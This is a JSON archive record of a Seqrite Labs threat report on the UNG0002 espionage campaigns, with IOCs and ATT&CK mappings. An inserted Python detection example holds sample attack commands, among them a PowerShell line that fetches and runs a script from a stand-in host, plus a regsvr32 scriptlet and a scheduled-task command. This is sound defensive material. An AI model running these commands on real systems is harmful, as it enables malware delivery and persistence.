{
	"id": "e0fce519-5e9b-46e7-97ac-c7f436f4911a",
	"created_at": "2026-04-06T00:19:24.444578Z",
	"updated_at": "2026-04-10T13:12:13.93229Z",
	"deleted_at": null,
	"sha1_hash": "b46dc03afdc84aaf35f9d364fa7636547e22c462",
	"title": "UNG0002: Regional Threat Operations Tracked Across Multiple Asian Jurisdictions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 397593,
	"plain_text": "UNG0002: Regional Threat Operations Tracked Across Multiple\r\nAsian Jurisdictions\r\nBy Subhajeet Singha\r\nPublished: 2025-07-16 · Archived: 2026-04-05 15:31:32 UTC\r\nOverview\r\nSeqrite Labs APT-Team has identified and tracked UNG0002 also known as Unknown Group 0002, a bunch of\r\nespionage-oriented operations which has been grouped under the same cluster conducting campaigns across\r\nmultiple Asian jurisdictions including China, Hong Kong, and Pakistan. This threat entity demonstrates a strong\r\npreference for using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and\r\nMetasploit, while consistently deploying CV-themed decoy documents to lure victims.\r\nThe cluster’s operations span two major campaigns: Operation Cobalt Whisper (May 2024 – September 2024)\r\nand Operation AmberMist (January 2025 – May 2025). During Operation Cobalt Whisper, 20 infection chains\r\nwere observed targeting defense, electrotechnical engineering, and civil aviation sectors. The more recent\r\nOperation AmberMist campaign has evolved to target gaming, software development, and academic institutions\r\nwith improved lightweight implants including Shadow RAT, Blister DLL Implant, and INET RAT.\r\nIn the recent operation AmberMist, the threat entity has also abused the ClickFix Technique – a social engineering\r\nmethod that tricks victims into executing malicious PowerShell scripts through fake CAPTCHA verification\r\npages. 
Additionally, UNG0002 leverages DLL sideloading techniques, particularly abusing legitimate Windows applications like Rasphone and Node-Webkit binaries to execute malicious payloads.\r\nKey Findings\r\nMulti-Stage Attacks: UNG0002 employs sophisticated infection chains using malicious LNK files, VBScript, batch scripts, and PowerShell to deploy custom RAT implants including Shadow RAT, INET RAT, and Blister DLL.\r\nClickFix Social Engineering: The group uses fake CAPTCHA verification pages to trick victims into executing malicious PowerShell scripts, notably spoofing the website of Pakistan’s Ministry of Maritime Affairs.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 1 of 11\r\nAbusing DLL Sideloading: In the recent campaign, consistent abuse of legitimate Windows applications (Rasphone, Node-Webkit) for DLL sideloading to execute malicious payloads while evading detection.\r\nCV-Themed Decoy Documents: Use of realistic resume documents targeting specific industries, including fake profiles of game UI designers and computer science students from prestigious institutions.\r\nPersistent Infrastructure: Maintained command and control infrastructure with consistent naming patterns and operational security across multiple campaigns spanning more than a year.\r\nTargeted Industry Focus: Systematic targeting of the defense, electrotechnical engineering, energy, civil aviation, academia, medical, cybersecurity research, gaming, and software development sectors.\r\nAttribution Challenges: UNG0002 is an evolving threat cluster that shows high adaptability, mimicking techniques from other threat actors’ playbooks to complicate attribution; Seqrite Labs assesses with high confidence that the group originates from South-East Asia and focuses on espionage activities. 
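The behaviours listed above (pasted ClickFix PowerShell one-liners, the LNK ➝ VBS ➝ BAT ➝ PowerShell chain, regsvr32 scriptlets, scheduled tasks named SysUpdater/UtilityUpdater, and DLL sideloading through Rasphone and Node-Webkit) map onto a handful of endpoint telemetry checks. The following Python is an added example written for this page, not code from the Seqrite report: it runs simple detection rules over constructed Sysmon-style process-creation and image-load records. The explorer.exe parent for the pasted ClickFix command, the nw.exe file name for Node-Webkit, the rasdlg.dll module name, the .invalid host and every sample event are assumptions made for illustration.

```python
# Added example (not from the Seqrite report): detection rules for the
# UNG0002 behaviours above, run over constructed Sysmon-style
# process-creation (Event ID 1) and image-load (Event ID 7) records.
from dataclasses import dataclass

SYSTEM_DIRS = ('c:/windows/system32/', 'c:/windows/syswow64/')
# Sideloading hosts named in the report; 'nw.exe' as the Node-Webkit
# executable name is an assumption, not something the report states.
SIDELOAD_HOSTS = ('rasphone.exe', 'nw.exe')
# Scheduled task names the report attributes to the cluster.
SUSPECT_TASKS = ('sysupdater', 'utilityupdater')
# Switches and cmdlets typical of a pasted one-liner loader.
PS_LURE_MARKERS = ('-enc', '-encodedcommand', 'hidden', 'iwr ',
                   'invoke-webrequest', 'downloadstring', 'iex',
                   'invoke-expression')

@dataclass
class Event:
    kind: str             # 'process' or 'imageload'
    image: str            # full path of the process image
    parent: str = ''      # parent image (process events)
    cmdline: str = ''     # command line (process events)
    loaded: str = ''      # loaded module path (imageload events)
    signed: bool = True   # module signature state (imageload events)

def _norm(path):
    # Lower-case and turn Windows separators into '/' so rules use one form.
    return path.lower().replace(chr(92), '/')

def _basename(path):
    return _norm(path).rsplit('/', 1)[-1]

def detect(ev):
    '''Return the names of every rule that fires for a single event.'''
    hits = []
    name = _basename(ev.image)
    cmd = _norm(ev.cmdline)
    if ev.kind == 'process':
        # ClickFix: the victim pastes the clipboard payload into a Run box, so
        # the shell is a child of explorer.exe (assumed launch path) and its
        # command line carries download/encoding switches.
        if (name in ('powershell.exe', 'pwsh.exe')
                and _basename(ev.parent) == 'explorer.exe'
                and any(m in cmd for m in PS_LURE_MARKERS)):
            hits.append('clickfix_powershell_from_explorer')
        # regsvr32 executing a scriptlet (the report names run.sct).
        if name == 'regsvr32.exe' and '/i:' in cmd and '.sct' in cmd:
            hits.append('regsvr32_scriptlet')
        # LNK -> VBS stage: wscript running a .vbs from a user-writable path.
        script = next((t for t in cmd.split() if t.endswith('.vbs')), None)
        if (name in ('wscript.exe', 'cscript.exe') and script
                and not script.startswith(('c:/windows/', 'c:/program files'))):
            hits.append('wscript_user_path_vbs')
        # Persistence via the reported task names.
        if (name == 'schtasks.exe' and '/create' in cmd
                and any(t in cmd for t in SUSPECT_TASKS)):
            hits.append('schtasks_known_task_name')
    elif ev.kind == 'imageload':
        mod = _norm(ev.loaded)
        # DLL sideloading: a relocated host binary loads an unsigned DLL from
        # outside the system directories (typically its own folder).
        if (name in SIDELOAD_HOSTS and mod.endswith('.dll')
                and not mod.startswith(SYSTEM_DIRS) and not ev.signed):
            hits.append('dll_sideload_' + name.split('.')[0])
    return hits

def scan(events):
    '''Group the triggering command line or module path under each rule.'''
    report = {}
    for ev in events:
        for rule in detect(ev):
            report.setdefault(rule, []).append(ev.cmdline or ev.loaded)
    return report

# Constructed telemetry: five events mirroring the reported chain plus two
# benign controls. Paths use '/' for brevity; real records carry backslashes,
# which _norm() handles. rasdlg.dll and the .invalid host are placeholders.
SAMPLE_EVENTS = [
    Event('process', 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
          parent='C:/Windows/explorer.exe',
          cmdline='powershell -w hidden -c iwr http://captcha.example.invalid/v.ps1 | iex'),
    Event('process', 'C:/Windows/System32/regsvr32.exe',
          cmdline='regsvr32 /s /n /u /i:C:/Users/victim/AppData/Local/Temp/run.sct scrobj.dll'),
    Event('process', 'C:/Windows/System32/wscript.exe', parent='C:/Windows/explorer.exe',
          cmdline='wscript.exe C:/Users/victim/Downloads/CV/update.vbs'),
    Event('process', 'C:/Windows/System32/schtasks.exe',
          cmdline='schtasks /create /sc minute /mo 15 /tn SysUpdater /tr C:/Users/Public/u.bat'),
    Event('imageload', 'C:/Users/Public/Libraries/rasphone.exe',
          loaded='C:/Users/Public/Libraries/rasdlg.dll', signed=False),
    Event('process', 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
          parent='C:/Windows/System32/cmd.exe', cmdline='powershell Get-Date'),
    Event('imageload', 'C:/Windows/System32/rasphone.exe',
          loaded='C:/Windows/System32/rasdlg.dll', signed=True),
]

if __name__ == '__main__':
    for rule, evidence in sorted(scan(SAMPLE_EVENTS).items()):
        print(rule, '<-', evidence)
```

Running the block prints one line per rule with the evidence that triggered it. The two benign controls (a PowerShell session started from cmd.exe and the genuine System32 rasphone.exe loading a signed DLL) produce no hits; that negative check matters in practice, because the sideloading rule must key on a relocated, unsigned load rather than on the host binary name alone, or every legitimate Rasphone dial-up session becomes an alert.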
As more intelligence becomes available, associated campaigns may be expanded or refined in the future.\r\nSummary\r\nUNG0002 is a sophisticated and persistent threat entity from South Asia that has maintained consistent operations targeting multiple Asian jurisdictions since at least May 2024. The group demonstrates high adaptability and technical proficiency, continuously evolving its toolset while maintaining consistent tactics, techniques, and procedures.\r\nThe threat actor’s focus on specific geographic regions (China, Hong Kong, Pakistan) and targeted industries suggests a strategic approach to intelligence gathering, i.e. classic espionage activity. Their use of legitimate-looking decoy documents, social engineering techniques, and pseudo-advanced evasion methods indicates a well-resourced and experienced operation.\r\nUNG0002 demonstrates consistent operational patterns across both Operation Cobalt Whisper and Operation AmberMist, maintaining similar infrastructure naming conventions, payload delivery mechanisms, and target selection criteria. The group’s evolution from relying primarily on the Cobalt Strike and Metasploit frameworks to developing custom implants like Shadow RAT, INET RAT, and Blister DLL indicates its persistence. Notable technical artifacts include PDB paths revealing development environments, such as C:\\Users\\The Freelancer\\source\\repos\\JAN25\\mustang\\x64\\Release\\mustang.pdb for Shadow RAT and C:\\Users\\Shockwave\\source\\repos\\memcom\\x64\\Release\\memcom.pdb for INET RAT, suggesting the code names “Mustang” and “ShockWave”, which point to mimicry of already-existing threat groups. An in-depth technical analysis of the complete infection chains and detailed campaign specifics can be found in our comprehensive whitepaper.\r\nConclusion\r\nAttributing threat activity to a specific group is always a complex task. It requires detailed analysis across several areas, including targeting patterns, tactics and techniques (TTPs), geographic focus, and any slip-ups in operational security. UNG0002 is an evolving cluster that Seqrite Labs is actively monitoring. As more intelligence becomes available, we may expand or refine the associated campaigns. Based on our current findings, we assess with high confidence that this group originates from South-East Asia and demonstrates a high level of adaptability, often mimicking techniques seen in other threat actor playbooks to complicate attribution, while focusing on espionage. We also appreciate other researchers in the community, like malwarehunterteam, for hunting these campaigns.\r\nIOCs\r\nNon-PE [Script-Based Files, Shortcut, C2-Config, Encrypted Shellcode blobs]\r\nFile Type | Hash (SHA-256)\r\nLNK (Shortcut) | 4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148\r\nLNK (Shortcut) | 55dc772d1b59c387b5f33428d5167437dc2d6e2423765f4080ee3b6a04947ae9\r\nLNK (Shortcut) | 4b410c47465359ef40d470c9286fb980e656698c4ee4d969c86c84fbd012af0d\r\nSCT (Scriptlet) | c49e9b556d271a853449ec915e4a929f5fa7ae04da4dc714c220ed0d703a36f7\r\nVBS (VBScript) | ad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850\r\nVBS (VBScript) | c722651d72c47e224007c2111e0489a028521ccdf5331c92e6cd9cfe07076918\r\nVBS (VBScript) | 2140adec9cde046b35634e93b83da4cc9a8aa0a71c21e32ba1dce2742314e8dc\r\nBatch Script (.bat) | a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5\r\nPowerShell (.ps1) | a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5\r\nTXT – C2 Config | 2df309018ab935c47306b06ebf5700dcf790fff7cebabfb99274fe867042ecf0\r\nTXT – C2 Config | b7f1d82fb80e02b9ebe955e8f061f31dc60f7513d1f9ad0a831407c1ba0df87e\r\nShellcode (.dat) | 2c700126b22ea8b22b8b05c2da05de79df4ab7db9f88267316530fa662b4db2c\r\nPE – Implants\r\nHash (SHA-256) | Malware Type | Notes\r\nc3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6 | Blister DLL Implant | Used in Operation AmberMist, DLL sideloaded via Node-Webkit\r\n4c79934beb1ea19f17e39fd1946158d3dd7d075aa29d8cd259834f8cd7e04ef8 | Blister DLL Implant | Same family as above, possible variant\r\n2bdd086a5fce1f32ea41be86febfb4be7782c997cfcb028d2f58fee5dd4b0f8a | INET RAT | Shadow RAT rewrite with anti-analysis and C2 flexibility\r\n90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99 | Shadow RAT | Deployed via Rasphone with decoy and config loader\r\nMITRE ATT\u0026CK\r\nTactic | Technique | Technique ID | Observed Behavior / Example\r\nReconnaissance | Spearphishing for Information | T1598.002 | Use of job-themed resumes (e.g., Zhang Wanwan \u0026 Li Mingyue CVs) to target specific sectors.\r\nResource Development | Develop Capabilities | T1587 | Custom implants: INET RAT (rewrite of Shadow RAT), use of Blister DLL loader.\r\nResource Development | Acquire Infrastructure | T1583.001, T1583.006 | Use of spoofed domains (e.g., moma[.]islamabadpk[.]site); ASN usage.\r\nInitial Access | Spearphishing Attachment | T1566.001 | Use of malicious ZIPs with LNKs and VBS (e.g., 张婉婉简历.zip, 李明月_CV.pdf.lnk).\r\nInitial Access | Drive-by Compromise (ClickFix technique) | T1189 | Malicious site tricks the user into pasting PowerShell copied to the clipboard.\r\nExecution | Command and Scripting Interpreter (PowerShell, VBScript, Batch) | T1059 | Multi-stage execution via VBS ➝ BAT ➝ PowerShell.\r\nExecution | System Binary Proxy Execution (wscript, rasphone, regsvr32) | T1218 | Use of LOLBINs like wscript.exe, regsvr32.exe, rasphone.exe for execution and sideloading.\r\nExecution | Scripting (Scriptlets – .sct files) | T1059.005 | Use of run.sct via regsvr32 for further payload execution.\r\nPersistence | Scheduled Task/Job: Scheduled Task | T1053.005 | Tasks like SysUpdater, UtilityUpdater scheduled for recurring execution.\r\nPrivilege Escalation | DLL Search Order Hijacking | T1574.001 | DLL sideloading via rasphone.exe, node-webkit for Shadow RAT, Blister loader.\r\nDefense Evasion | Obfuscated Files or Information | T1027 | Scripts with obfuscation, hex-encoded C2 configs, junk code in SCTs.\r\nDefense Evasion | Deobfuscate/Decode Files or Information | T1140 | INET RAT decrypting C2 configuration from list.txt.\r\nDefense Evasion | Software Packing (Shellcode loader) | T1027.002 | Blister decrypts and injects shellcode from update.dat using AES.\r\nDefense Evasion | Indirect Command Execution | T1202 | Executing SCT through regsvr32, using P/Invoke to load DLLs.\r\nCredential Access | Input Capture (potential within Shadow/INET RAT) | T1056 | RAT capabilities imply possible credential theft.\r\nDiscovery | System Information Discovery | T1082 | INET RAT collects computer/user names upon execution.\r\nCommand \u0026 Control | Application Layer Protocol: Web Protocols | T1071.001 | Shadow/INET RATs communicate over HTTP(S).\r\nCommand \u0026 Control | Ingress Tool Transfer | T1105 | Payloads and decoys downloaded from external servers.\r\nCollection | Data from Local System | T1005 | Likely via RATs for file collection or clipboard access.\r\nExfiltration | Exfiltration Over C2 Channel | T1041 | Shadow/INET RAT reverse shell features suggest data tunneling over the same HTTP channel.\r\nAuthors\r\nSathwik Ram Prakki\r\nSubhajeet Singha\r\nSource: https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/"
	],
	"report_names": [
		"ung0002-espionage-campaigns-south-asia"
	],
	"threat_actors": [
		{
			"id": "535a1a2d-0cc7-4746-bed1-4ab13b6ec979",
			"created_at": "2024-11-08T02:00:03.970177Z",
			"updated_at": "2026-04-10T02:00:03.74428Z",
			"deleted_at": null,
			"main_name": "Operation Cobalt Whisper",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Cobalt Whisper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fa8f111a-5ace-4234-a4f7-07ce2b429606",
			"created_at": "2026-02-07T02:00:03.663624Z",
			"updated_at": "2026-04-10T02:00:03.960722Z",
			"deleted_at": null,
			"main_name": "UNG0002",
			"aliases": [],
			"source_name": "MISPGALAXY:UNG0002",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434764,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.pdf",
		"text": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.txt",
		"img": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.jpg"
	}
}